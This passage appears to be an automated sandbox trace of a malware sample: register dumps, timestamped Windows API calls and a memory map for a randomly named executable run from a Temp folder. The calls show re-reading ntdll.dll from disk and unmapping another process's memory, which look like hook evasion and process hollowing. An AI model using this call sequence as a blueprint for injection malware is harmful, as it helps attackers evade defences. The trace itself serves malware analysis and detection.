FloatSave.DataSelector=0xfffffffe, FloatSave.RegisterArea=([0]=0x86, [1]=0x5, [2]=0x0, [3]=0x0, [4]=0x30, [5]=0x3b, [6]=0x5b, [7]=0x0, [8]=0x1a, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x3c, [17]=0x8, [18]=0xca, [19]=0x22, [20]=0x8, [21]=0xca, [22]=0x22, [23]=0x3c, [24]=0x3c, [25]=0x8, [26]=0xca, [27]=0x22, [28]=0x8, [29]=0xca, [30]=0x22, [31]=0x3c, [32]=0x10, [33]=0xf7, [34]=0x19, [35]=0x0, [36]=0xac, [37]=0x9a, [38]=0x25, [39]=0x74, [40]=0x48, [41]=0xf7, [42]=0x19, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x90, [49]=0xfb, [50]=0x19, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x10, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x34, [71]=0x0, [72]=0xd4, [73]=0xa4, [74]=0x5c, [75]=0x0, [76]=0x1, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x5ca4d4, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x40a224, Ebp=0x0, Eip=0x771faef0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x42, [1]=0x2, [2]=0x0, [3]=0x0, [4]=0x50, [5]=0xdb, [6]=0x5c, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0xd9, [17]=0xd2, [18]=0x1c, [19]=0x77, [20]=0xa6, [21]=0x52, [22]=0x48, [23]=0xeb, [24]=0xd9, [25]=0xd2, [26]=0x1c, [27]=0x77, [28]=0xde, [29]=0x52, [30]=0x48, [31]=0xeb, [32]=0x0, [33]=0x0, [34]=0x59, [35]=0x0, [36]=0x20, [37]=0xb0, [38]=0x5c, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x1c, [45]=0x0, [46]=0x0, [47]=0x1c, [48]=0x10, [49]=0xd8, [50]=0x0, [51]=0x0, [52]=0xa, [53]=0x0, [54]=0x0, [55]=0xa, [56]=0xd9, [57]=0xd2, [58]=0x1c, [59]=0x77, [60]=0x2, [61]=0x0, [62]=0x0, [63]=0x2, [64]=0x0, [65]=0x0, [66]=0x59, [67]=0x0, [68]=0x0, [69]=0xb9, [70]=0x5c, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x86, [77]=0x5, [78]=0x0, [79]=0x83, [80]=0xc0, [81]=0x47, [82]=0x25, [83]=0x74, [84]=0x4, [85]=0x0, [86]=0x0, [87]=0x4, [88]=0xcc, [89]=0xf7, [90]=0x19, [91]=0x0, [92]=0xa, [93]=0x0, [94]=0x0, [95]=0xa, [96]=0xb0, [97]=0xa4, [98]=0x5c, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x34, [103]=0x0, [104]=0x74, [105]=0xff, [106]=0xff, [107]=0xff, [108]=0x86, [109]=0x5, [110]=0x0, [111]=0x83, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0xf5, [117]=0x0, [118]=0x0, [119]=0xf5, [120]=0xfe, [121]=0xff, [122]=0xff, [123]=0xff, [124]=0x1c, [125]=0x0, [126]=0x0, [127]=0x1c, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x80, [133]=0xa4, [134]=0x5c, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x59, [139]=0x0, [140]=0x20, [141]=0xb0, [142]=0x5c, [143]=0x0, [144]=0x84, [145]=0x2, [146]=0x59, [147]=0x0, [148]=0x90, [149]=0xa4, [150]=0x5c, [151]=0x0, [152]=0x80, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x86, [157]=0x0, [158]=0x0, [159]=0x86, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x1c, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x59, [171]=0x0, [172]=0x1, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x54, [177]=0x58, [178]=0x59, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x80, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0xa, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0xe0, [193]=0x26, [194]=0x59, [195]=0x0, [196]=0x6, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0xa, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x28, [213]=0xb0, [214]=0x5c, [215]=0x0, [216]=0x1b, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0xd0, [221]=0xa9, [222]=0x5a, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x1b, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x1b, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x1b, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0xc7, [242]=0x1c, [243]=0x1, [244]=0x60, [245]=0x2, [246]=0x59, [247]=0x0, [248]=0x1b, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x60, [253]=0x2, [254]=0x59, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x1, [260]=0x88, [261]=0x7e, [262]=0x59, [263]=0x0, [264]=0x88, [265]=0xde, [266]=0x5a, [267]=0x0, [268]=0xbc, [269]=0xf8, [270]=0x19, [271]=0x0, [272]=0x40, [273]=0xd, [274]=0x20, [275]=0x77, [276]=0xf6, [277]=0xbc, [278]=0x79, [279]=0x9c, [280]=0xfe, [281]=0xff, [282]=0xff, [283]=0xff, [284]=0x74, [285]=0xf8, [286]=0x19, [287]=0x0, [288]=0x50, [289]=0xc6, [290]=0x20, [291]=0x77, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x28, [297]=0xb0, [298]=0x5c, [299]=0x0, [300]=0x1, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x28, [305]=0xb0, [306]=0x5c, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x88, [313]=0xde, [314]=0x5a, [315]=0x0, [316]=0x28, [317]=0xb0, [318]=0x5c, [319]=0x0, [320]=0x8, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x88, [325]=0x7e, [326]=0x59, [327]=0x0, [328]=0x9c, [329]=0xf8, [330]=0x19, [331]=0x0, [332]=0x3a, [333]=0xc6, [334]=0x20, [335]=0x77, [336]=0x84, [337]=0xf8, [338]=0x19, [339]=0x0, [340]=0x2c, [341]=0xc7, [342]=0x1c, [343]=0x77, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0xcc, [353]=0xf8, [354]=0x19, [355]=0x0, [356]=0xb7, [357]=0x1c, [358]=0xfc, [359]=0x75, [360]=0x0, [361]=0x0, [362]=0x59, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0xd0, [369]=0x1c, [370]=0xfc, [371]=0x75, [372]=0xf0, [373]=0xb0, [374]=0x97, [375]=0xd3, [376]=0x1, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x28, [381]=0xb0, [382]=0x5c, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x59, [391]=0x0, [392]=0xc8, [393]=0xf8, [394]=0x19, [395]=0x0, [396]=0x4c, [397]=0x8b, [398]=0x20, [399]=0x73, [400]=0x98, [401]=0xf8, [402]=0x19, [403]=0x0, [404]=0x8, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0xf9, [410]=0x19, [411]=0x0, [412]=0xa0, [413]=0x89, [414]=0xff, [415]=0x75, [416]=0xcc, [417]=0xb1, [418]=0x8b, [419]=0xa5, [420]=0xfe, [421]=0xff, [422]=0xff, [423]=0xff, [424]=0xd0, [425]=0x1c, [426]=0xfc, [427]=0x75, [428]=0xb7, [429]=0x53, [430]=0x23, [431]=0x73, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0xfd, [437]=0xac, [438]=0xba, [439]=0xcc, [440]=0x38, [441]=0xfa, [442]=0x19, [443]=0x0, [444]=0xb0, [445]=0xf9, [446]=0x19, [447]=0x0, [448]=0xe5, [449]=0x53, [450]=0x23, [451]=0x73, [452]=0x1, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0xfd, [465]=0xac, [466]=0xba, [467]=0xcc, [468]=0xd8, [469]=0xf8, [470]=0x19, [471]=0x0, [472]=0xd4, [473]=0xf8, [474]=0x19, [475]=0x0, [476]=0xcc, [477]=0xff, [478]=0x19, [479]=0x0, [480]=0x20, [481]=0x66, [482]=0x23, [483]=0x73, [484]=0x5d, [485]=0x90, [486]=0x80, [487]=0xbf, [488]=0xfe, [489]=0xff, [490]=0xff, [491]=0xff, [492]=0x48, [493]=0xfa, [494]=0x19, [495]=0x0, [496]=0x6c, [497]=0xf9, [498]=0xeb, [499]=0x1, [500]=0x28, [501]=0xb0, [502]=0x5c, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x74, [509]=0xfb, [510]=0x19, [511]=0x0))) returned 1 [0036.959] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75d40000 [0036.959] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19f2ec | out: Wow64Process=0x19f2ec) returned 1 [0036.963] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75d40000 [0036.963] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0036.964] GetFileSize (in: hFile=0x23c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0036.964] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x8a90000 [0036.964] ReadFile (in: hFile=0x23c, lpBuffer=0x8a90000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x19f328, lpOverlapped=0x0 | out: lpBuffer=0x8a90000*, lpNumberOfBytesRead=0x19f328*=0x176638, lpOverlapped=0x0) returned 1 [0036.977] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x8c10000 [0036.997] VirtualFree (lpAddress=0x8a90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.002] VirtualFree (lpAddress=0x8c10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.006] NtResumeThread (in: ThreadHandle=0x1ec067a, SuspendCount=0x19f428 | out: SuspendCount=0x19f428*=0x1) returned 0x0 [0037.049] CloseHandle (hObject=0x238) returned 1 [0037.049] CloseHandle (hObject=0x22c) returned 1 [0037.049] CloseHandle (hObject=0x240) returned 1 [0037.052] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75d40000 [0037.052] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19f2f4 | out: Wow64Process=0x19f2f4) returned 1 [0037.055] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x75d40000 [0037.056] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x240 [0037.056] GetFileSize (in: hFile=0x240, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0037.056] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x8a90000 [0037.056] ReadFile (in: hFile=0x240, lpBuffer=0x8a90000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x8a90000*, lpNumberOfBytesRead=0x19f330*=0x176638, lpOverlapped=0x0) returned 1 [0037.070] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x8c10000 [0037.212] VirtualFree (lpAddress=0x8a90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.217] VirtualFree (lpAddress=0x8c10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.222] NtUnmapViewOfSection (ProcessHandle=0x1ec067a, BaseAddress=0x3f0000) returned 0x0 [0037.222] ExitProcess (uExitCode=0x0) Thread: id = 23 os_tid = 0xfb4 Thread: id = 24 os_tid = 0xfc4 Thread: id = 25 os_tid = 0xfc8 Process: id = "6" image_name = "vworbzlbc.exe" filename = "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vworbzlbc.exe" page_root = "0x30c1d000" os_pid = "0xfe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xfac" cmd_line = "\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe\"" cur_dir = "C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013d92" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 544 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 545 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 546 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 547 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 548 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 549 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 550 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 551 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 552 start_va = 0x400000 end_va = 0x43bfff entry_point = 0x400000 region_type = mapped_file name = "vworbzlbc.exe" filename = "\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vwOrbzLbc.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vworbzlbc.exe") Region: id = 553 start_va = 0x77190000 end_va = 0x77308fff entry_point = 0x77190000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 554 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 555 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 556 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 557 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 558 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 559 start_va = 0x7fff0000 end_va = 0x7ffb3d30ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 560 start_va = 0x7ffb3d310000 end_va = 0x7ffb3d4d1fff entry_point = 0x7ffb3d310000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 561 start_va = 0x7ffb3d4d2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb3d4d2000" filename = "" Region: id = 568 start_va = 0x400000 end_va = 0x40efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 576 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 577 start_va = 0x5ca00000 end_va = 0x5ca72fff entry_point = 0x5ca00000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 578 start_va = 0x5ca80000 end_va = 0x5cacefff entry_point = 0x5ca80000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 579 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 580 start_va = 0x5c9f0000 end_va = 0x5c9f7fff entry_point = 0x5c9f0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 583 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 584 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 585 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 586 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 587 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 588 start_va = 0x410000 end_va = 0x4cdfff entry_point = 0x410000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 589 start_va = 0x4d0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 590 start_va = 0x5d0000 end_va = 0x757fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 591 start_va = 0x810000 end_va = 0x81ffff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 592 start_va = 0x820000 end_va = 0x9a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 593 start_va = 0x9b0000 end_va = 0x1daffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 594 start_va = 0x74230000 end_va = 0x74288fff entry_point = 0x74230000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 595 start_va = 0x74290000 end_va = 0x74299fff entry_point = 0x74290000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 596 start_va = 0x742a0000 end_va = 0x742bdfff entry_point = 0x742a0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 597 start_va = 0x74500000 end_va = 0x7463ffff entry_point = 0x74500000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 598 start_va = 0x74730000 end_va = 0x7475afff entry_point = 0x74730000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 599 start_va = 0x74760000 end_va = 0x75b1efff entry_point = 0x74760000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 600 start_va = 0x75b80000 end_va = 0x75c3dfff entry_point = 0x75b80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 601 start_va = 0x75c40000 end_va = 0x75c83fff entry_point = 0x75c40000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 602 start_va = 0x75d40000 end_va = 0x75dbafff entry_point = 0x75d40000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 603 start_va = 0x75dc0000 end_va = 0x75e03fff entry_point = 0x75dc0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 604 start_va = 0x75e70000 end_va = 0x75f1bfff entry_point = 0x75e70000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 605 start_va = 0x75f20000 end_va = 0x76095fff entry_point = 0x75f20000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 606 start_va = 0x760a0000 end_va = 0x760e2fff entry_point = 0x760a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 607 start_va = 0x76280000 end_va = 0x7630cfff entry_point = 0x76280000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 608 start_va = 0x764d0000 end_va = 0x769acfff entry_point = 0x764d0000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 609 start_va = 0x769b0000 end_va = 0x76afcfff entry_point = 0x769b0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 610 start_va = 0x76bc0000 end_va = 0x76caffff entry_point = 0x76bc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 611 start_va = 0x76cf0000 end_va = 0x76ea9fff entry_point = 0x76cf0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 612 start_va = 0x76eb0000 end_va = 0x76ebbfff entry_point = 0x76eb0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 613 start_va = 0x77050000 end_va = 0x7705efff entry_point = 0x77050000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 614 start_va = 0x77070000 end_va = 0x7718ffff entry_point = 0x77070000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 615 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 616 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 617 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 618 start_va = 0x1db0000 end_va = 0x1f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 619 start_va = 0x1f50000 end_va = 0x2286fff entry_point = 0x1f50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 620 start_va = 0x731d0000 end_va = 0x731f7fff entry_point = 0x731d0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 621 start_va = 0x73230000 end_va = 0x73242fff entry_point = 0x73230000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 622 start_va = 0x736e0000 end_va = 0x736fafff entry_point = 0x736e0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 623 start_va = 0x73200000 end_va = 0x7322efff entry_point = 0x73200000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 624 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 625 start_va = 0x2290000 end_va = 0x3297fff entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 626 start_va = 0x1db0000 end_va = 0x1eaffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 627 start_va = 0x1f40000 end_va = 0x1f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 628 start_va = 0x230000 end_va = 0x245fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 629 start_va = 0x250000 end_va = 0x258fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 630 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 631 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 632 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 633 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 634 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 635 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 636 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 637 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 638 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 639 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 640 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 641 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 642 start_va = 0x230000 end_va = 0x238fff entry_point = 0x0 region_type = pagefile_backed name = 